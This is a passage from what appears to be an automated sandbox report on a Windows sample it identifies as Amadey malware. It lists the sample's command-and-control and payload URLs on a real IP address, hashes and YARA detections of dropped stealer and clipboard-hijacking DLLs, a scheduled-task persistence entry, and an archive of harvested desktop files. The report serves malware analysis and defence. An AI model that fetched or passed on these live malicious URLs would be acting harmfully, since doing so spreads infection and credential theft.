                                              https://contoso.com/powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2047365994.0000020057384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://185.215.113.32/explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://185.215.113.32/yandex/index.phpa2ab05explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://185.215.113.32/yandex/index.phpnexplorgu.exe, 00000005.00000002.2870677611.00000000010A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://185.215.113.32/yandex/index.phppexplorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://185.215.113.32/yandex/index.phpa0explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://aka.ms/pscore68powershell.exe, 0000000B.00000002.2031780544.0000020047311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://185.215.113.32/yandex/index.php?wal=1&rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://185.215.113.32/yandex/index.phpuexplorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.2031780544.0000020047311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://185.215.113.32/yandex/Plugins/cred64.dll2explorgu.exe, 00000005.00000002.2870677611.00000000010D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://185.215.113.32/yandex/index.phpxexplorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    185.215.113.32
                                                    		unknownPortugal
                                                    		206894WHOLESALECONNECTIONSNLtrue

                                                    General Information

                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1417243
                                                    Start date and time:2024-03-28 20:01:43 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 33s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:14
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:wIaKimJFke.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:79fbd35cae4148d9053cd4590b6d41c0.exe
                                                    Detection:MAL
                                                    Classification:mal100.phis.troj.spyw.evad.winEXE@15/21@0/1
                                                    EGA Information:
                                                    • Successful, ratio: 60%
                                                    HCA Information:Failed
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target explorgu.exe, PID 7488 because there are no executed function
                                                    • Execution Graph export aborted for target powershell.exe, PID 1308 because it is empty
                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • VT rate limit hit for: wIaKimJFke.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    19:02:30Task SchedulerRun new task: explorgu path: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                    20:03:01API Interceptor1361574x Sleep call for process: explorgu.exe modified
                                                    20:03:07API Interceptor17x Sleep call for process: powershell.exe modified
                                                    20:03:41API Interceptor99743x Sleep call for process: rundll32.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    185.215.113.32uPhflw1gEJ.exeGet hashmaliciousAmadeyBrowse
                                                    • 185.215.113.32/yandex/index.php
                                                    Vjt694rffx.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                    • 185.215.113.32/yandex/index.php
                                                    OtzSoOhX06.exeGet hashmaliciousAmadeyBrowse
                                                    • 185.215.113.32/yandex/index.php
                                                    rbx59IIp4z.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                    • 185.215.113.32/yandex/index.php
                                                    EIrPdlD2lA.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                    • 185.215.113.32/yandex/index.php
                                                    SecuriteInfo.com.Win32.PWSX-gen.14648.16043.exeGet hashmaliciousAmadeyBrowse
                                                    • 185.215.113.32/yandex/index.php
                                                    jKiqguIdjl.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                    • 185.215.113.32/yandex/index.php
                                                    tc7xnBGY8Z.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                    • 185.215.113.32/yandex/index.php
                                                    CtEeMS3H62.exeGet hashmaliciousAmadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                    • 185.215.113.32/yandex/index.php
                                                    uBhJLQ37k8.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                    • 185.215.113.32/yandex/index.php

                                                    Domains

                                                    No context

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    WHOLESALECONNECTIONSNLhttp://twizt.net/spl.exeGet hashmaliciousUnknownBrowse
                                                    • 185.215.113.66
                                                    XnUEBMnOEd.exeGet hashmaliciousUnknownBrowse
                                                    • 185.215.113.66
                                                    XnUEBMnOEd.exeGet hashmaliciousUnknownBrowse
                                                    • 185.215.113.66
                                                    Document.doc.lnkGet hashmaliciousMalLnkBrowse
                                                    • 185.215.113.66
                                                    YCImxTWoQs.exeGet hashmaliciousRedLineBrowse
                                                    • 185.215.113.67
                                                    uPhflw1gEJ.exeGet hashmaliciousAmadeyBrowse
                                                    • 185.215.113.32
                                                    2ZQkFRoMrY.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, SmokeLoader, XWorm, zgRATBrowse
                                                    • 185.215.113.67
                                                    Vjt694rffx.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                    • 185.215.113.67
                                                    OtzSoOhX06.exeGet hashmaliciousAmadeyBrowse
                                                    • 185.215.113.32
                                                    base.apkGet hashmaliciousUnknownBrowse
                                                    • 185.215.113.31

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dlluPhflw1gEJ.exeGet hashmaliciousAmadeyBrowse
                                                      2ZQkFRoMrY.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, SmokeLoader, XWorm, zgRATBrowse
                                                        Vjt694rffx.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                          OtzSoOhX06.exeGet hashmaliciousAmadeyBrowse
                                                            a5PfQvvi4y.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                              jl4cNPbc3h.exeGet hashmaliciousLummaC, Amadey, Glupteba, Mars Stealer, PureLog Stealer, RHADAMANTHYS, RedLineBrowse
                                                                6BxakoD7u9.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                  file.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                                    EIrPdlD2lA.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                                      NkvJGApqGf.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Glupteba, LummaC Stealer, Mars Stealer, Monster StealerBrowse
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dlluPhflw1gEJ.exeGet hashmaliciousAmadeyBrowse
                                                                          2ZQkFRoMrY.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, SmokeLoader, XWorm, zgRATBrowse
                                                                            Vjt694rffx.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                              OtzSoOhX06.exeGet hashmaliciousAmadeyBrowse
                                                                                a5PfQvvi4y.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                  jl4cNPbc3h.exeGet hashmaliciousLummaC, Amadey, Glupteba, Mars Stealer, PureLog Stealer, RHADAMANTHYS, RedLineBrowse
                                                                                    6BxakoD7u9.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                                      file.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                                                        EIrPdlD2lA.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                                                          NkvJGApqGf.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Glupteba, LummaC Stealer, Mars Stealer, Monster StealerBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1285632
                                                                                            Entropy (8bit):6.460516510065148
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:ZvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dgg/l+yC7:ZsMPSYcS5wPi095PbgWl
                                                                                            MD5:92FBDFCCF6A63ACEF2743631D16652A7
                                                                                            SHA1:971968B1378DD89D59D7F84BF92F16FC68664506
                                                                                            SHA-256:B4588FEACC183CD5A089F9BB950827B75DF04BD5A6E67C95FF258E4A34AA0D72
                                                                                            SHA-512:B8EA216D4A59D8858FD4128ABB555F8DCF3ACCA9138E663B488F09DC5200DB6DC11ECC235A355E801145BBBB44D7BEAC6147949D75D78B32FE9CFD2FA200D117
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: uPhflw1gEJ.exe, Detection: malicious, Browse
                                                                                            • Filename: 2ZQkFRoMrY.exe, Detection: malicious, Browse
                                                                                            • Filename: Vjt694rffx.exe, Detection: malicious, Browse
                                                                                            • Filename: OtzSoOhX06.exe, Detection: malicious, Browse
                                                                                            • Filename: a5PfQvvi4y.exe, Detection: malicious, Browse
                                                                                            • Filename: jl4cNPbc3h.exe, Detection: malicious, Browse
                                                                                            • Filename: 6BxakoD7u9.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: EIrPdlD2lA.exe, Detection: malicious, Browse
                                                                                            • Filename: NkvJGApqGf.exe, Detection: malicious, Browse
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d......e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):112128
                                                                                            Entropy (8bit):6.380855494726669
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:xE5kJp+s5aP40bGsuZR+SVhJQ3ICRv4l:m5ka2obfuZR7Py4l
                                                                                            MD5:2AFDBE3B99A4736083066A13E4B5D11A
                                                                                            SHA1:4D4856CF02B3123AC16E63D4A448CDBCB1633546
                                                                                            SHA-256:8D31B39170909595B518B1A03E9EC950540FABD545ED14817CAC5C84B91599EE
                                                                                            SHA-512:D89B3C46854153E60E3FA825B394344EEE33936D7DBF186AF9D95C9ADAE54428609E3BF21A18D38FCE3D96F3E0B8E4E0ED25CB5004FBE288DE3AEF3A85B1D93F
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: uPhflw1gEJ.exe, Detection: malicious, Browse
                                                                                            • Filename: 2ZQkFRoMrY.exe, Detection: malicious, Browse
                                                                                            • Filename: Vjt694rffx.exe, Detection: malicious, Browse
                                                                                            • Filename: OtzSoOhX06.exe, Detection: malicious, Browse
                                                                                            • Filename: a5PfQvvi4y.exe, Detection: malicious, Browse
                                                                                            • Filename: jl4cNPbc3h.exe, Detection: malicious, Browse
                                                                                            • Filename: 6BxakoD7u9.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            • Filename: EIrPdlD2lA.exe, Detection: malicious, Browse
                                                                                            • Filename: NkvJGApqGf.exe, Detection: malicious, Browse
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L......e...........!.....$..........Lf.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text....".......$.................. ..`.rdata..4h...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1504
                                                                                            Entropy (8bit):5.276227223006264
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:3rSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNUNEr8H0UMem:bSU4y4RQmFoUeCamfm9qr9tK8NfUNEIa
                                                                                            MD5:80431C8E41DDD0BB4C10AFAFA6A8D386
                                                                                            SHA1:03B1AE4E67F7E151E2EED58A506BEA4AE777743F
                                                                                            SHA-256:A22FA42F0CDD8F2155573B4B1F261A596A83A662AC90BBB1F2E716FA8E842B35
                                                                                            SHA-512:9CD2731695221FD77371A8190663751C007DB060864B36DC096349DDCE320AFEFB0DD5F9D7EDB8908C449A745282DADF3E652B07960FEFBDCBD9B83F8847B97B
                                                                                            Malicious:false
                                                                                            Preview:@...e...........4....................................@..........@...............|.jdY\.H.s9.!..|4.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                            C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\wIaKimJFke.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1906688
                                                                                            Entropy (8bit):7.949205320985039
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:rOixuZfOJofYPg+EevCu7OgYZkwtOc/Xe+vv:rOgIfOJosF/jYZk/cv
                                                                                            MD5:79FBD35CAE4148D9053CD4590B6D41C0
                                                                                            SHA1:3548D8FA1F242206447224068C16FFD30278EDE3
                                                                                            SHA-256:9C1751BA73FE53ED9385F24750212C6E785843E4C63DBAFEC8F95D3E6A5088EF
                                                                                            SHA-512:BABF970EE423976F68864C67D9EC7A0771BE65465B4EA3C498FD9A9AB98F08124BE2A0EC16F7952B237D27D778EF49EF9F48FE8AD66DD9A3F840FFC9A5658A40
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e............................. K...........@..........................PK.....=.....@.................................Vp..j....`......................,.J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...qrqrzugw......1.....................@...ajeqznom......K.....................@....taggant.0... K.."..................@...................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe:Zone.Identifier

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\wIaKimJFke.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:false
                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                            C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                            Category:dropped
                                                                                            Size (bytes):6145
                                                                                            Entropy (8bit):7.793921025132747
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:HqgbzTvWhgbzTvWdrT4ao7lJqFBUFzoOtADofAcNMXxROpC/ZtDEpC/ZtDt7ks:HqgDvWhgDvWdrTJHqFmDiNMBU040J7ks
                                                                                            MD5:83D547914EFC4C5F2710C666CFD43A73
                                                                                            SHA1:7FF30CFADD3154FCEC2A9FFA2335298F8A27C612
                                                                                            SHA-256:C6EF1629C65ADC407CC1A0DCEF9D80FBC1F629A9D7A2E48045F69F79C5D20B68
                                                                                            SHA-512:E4B171E510EFF1C9D93BF090B67DEC3C59AA56C9670C81F92B866D6C2AF5DDAEF23724A85422365A5301107F8F5CDE2EF9580972680209DA62C894FFF1C061C9
                                                                                            Malicious:true
                                                                                            Preview:PK........OpDWS.............._Files_\AIXACVYBSB.docx..Gn@1.D..r(.......$?.K..oF..~zj#6Ua....OSu..I.b.i.j...._".....5z]E...n..K...v...D8..<QHcl.r1...jJ..,2~xG..F.J..z..l...:..N8..b..66D... ....Wd.Z...x.eW.{.-...e....\&.|.$l$...}q.<.N..!=.s:W......J.......p.G..]......;$...NPN....\"..2....@.*VJ........0.T....B..)8.....>.z.2c...T..JV4...1....u)<g...j....E...{7lk.}.Q.^.5].......D.z.z..>..}U..F.Ro...2.;.K".;j...Jf5F2.+....T<Ck.|b.......%~..3.;..~.j...B...T.Qco5h;.9...O.(...s....&..5s..U..-.....c..[6.:..Yv.N.>#....N9._.............Qk.m...0/S=.g.kOI..R....c.1.L..k.x.6..e..k"..D...y...~..t....z.9m..Ny..%-..g........u. ||..!..e.....r+.k.[.....s..~...PK........OpDWS.............._Files_\AIXACVYBSB.xlsx..Gn@1.D..r(.......$?.K..oF..~zj#6Ua....OSu..I.b.i.j...._".....5z]E...n..K...v...D8..<QHcl.r1...jJ..,2~xG..F.J..z..l...:..N8..b..66D... ....Wd.Z...x.eW.{.-...e....\&.|.$l$...}q.<.N..!=.s:W......J.......p.G..]......;$...NPN....\"..2....@.*

                                                                                            C:\Users\user\AppData\Local\Temp\_Files_\AIXACVYBSB.docx

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1026
                                                                                            Entropy (8bit):4.690067217069288
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
                                                                                            MD5:4E32787C3D6F915D3CB360878174E142
                                                                                            SHA1:57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
                                                                                            SHA-256:2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
                                                                                            SHA-512:CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
                                                                                            Malicious:false
                                                                                            Preview:AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

                                                                                            C:\Users\user\AppData\Local\Temp\_Files_\AIXACVYBSB.xlsx

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1026
                                                                                            Entropy (8bit):4.690067217069288
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
                                                                                            MD5:4E32787C3D6F915D3CB360878174E142
                                                                                            SHA1:57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
                                                                                            SHA-256:2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
                                                                                            SHA-512:CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
                                                                                            Malicious:false
